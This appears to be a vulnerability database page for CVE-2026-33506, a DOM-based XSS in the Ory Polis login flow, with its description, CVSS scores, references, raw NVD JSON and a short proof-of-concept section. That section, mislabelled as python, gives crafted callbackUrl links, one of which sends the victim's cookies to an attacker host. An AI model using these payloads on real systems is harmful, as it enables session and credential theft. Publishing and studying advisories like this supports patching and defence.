CVE-2026-33506

Description

Ory Polis, formerly known as BoxyHQ Jackson, bridges or proxies a SAML login flow to OAuth 2.0 or OpenID Connect. Versions prior to 26.2.0 contain a DOM-based Cross-Site Scripting (XSS) vulnerability in Ory Polis's login functionality. The application improperly trusts a URL parameter (`callbackUrl`), which is passed to `router.push`. An attacker can craft a malicious link that, when opened by an authenticated user (or an unauthenticated user that later logs in), performs a client-side redirect and executes arbitrary JavaScript in the context of their browser. This could lead to credential theft, internal network pivoting, and unauthorized actions performed on behalf of the victim. Version 26.2.0 contains a patch for the issue.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:ory:polis:*:*:*:*:*:*:*:* - VULNERABLE

Ory Polis < 26.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
PoC for CVE-2026-33506
The application takes the 'callbackUrl' parameter and passes it to router.push.
By using the javascript: protocol, we can execute arbitrary code.
-->

<!-- Malicious Link Example -->
https://[target-domain]/login?callbackUrl=javascript:alert('CVE-2026-33506')

<!-- Payload to steal cookies -->
https://[target-domain]/login?callbackUrl=javascript:fetch('https://attacker.com/steal?c='+document.cookie)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33506
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33506
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33506/
[4] VulDB https://vuldb.com/cve/CVE-2026-33506
[5] https://github.com/ory/polis/releases/tag/v26.2.0
[6] https://github.com/ory/polis/security/advisories/GHSA-3wjr-6gw8-9j22

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33506", "sourceIdentifier": "[email protected]", "published": "2026-03-26T19:17:05.680", "lastModified": "2026-04-17T19:45:30.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ory Polis, formerly known as BoxyHQ Jackson, bridges or proxies a SAML login flow to OAuth 2.0 or OpenID Connect. Versions prior to 26.2.0 contain a DOM-based Cross-Site Scripting (XSS) vulnerability in Ory Polis's login functionality. The application improperly trusts a URL parameter (`callbackUrl`), which is passed to `router.push`. An attacker can craft a malicious link that, when opened by an authenticated user (or an unauthenticated user that later logs in), performs a client-side redirect and executes arbitrary JavaScript in the context of their browser. This could lead to credential theft, internal network pivoting, and unauthorized actions performed on behalf of the victim. Version 26.2.0 contains a patch for the issue."}, {"lang": "es", "value": "Ory Polis, anteriormente conocido como BoxyHQ Jackson, actúa como puente o proxy para un flujo de inicio de sesión SAML a OAuth 2.0 o OpenID Connect. Las versiones anteriores a la 26.2.0 contienen una vulnerabilidad de cross-site scripting (XSS) basada en DOM en la funcionalidad de inicio de sesión de Ory Polis. La aplicación confía indebidamente en un parámetro de URL ('callbackUrl'), el cual se pasa a `router.push`. Un atacante puede crear un enlace malicioso que, al ser abierto por un usuario autenticado (o un usuario no autenticado que luego inicia sesión), realiza una redirección del lado del cliente y ejecuta JavaScript arbitrario en el contexto de su navegador. Esto podría conducir a robo de credenciales, pivoteo de red interno y acciones no autorizadas realizadas en nombre de la víctima. La versión 26.2.0 contiene un parche para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.3}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-87"}, {"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ory:polis:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2.0", "matchCriteriaId": "35374CF5-7055-4168-AE87-931558915B5C"}]}]}], "references": [{"url": "https://github.com/ory/polis/releases/tag/v26.2.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/ory/polis/security/advisories/GHSA-3wjr-6gw8-9j22", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}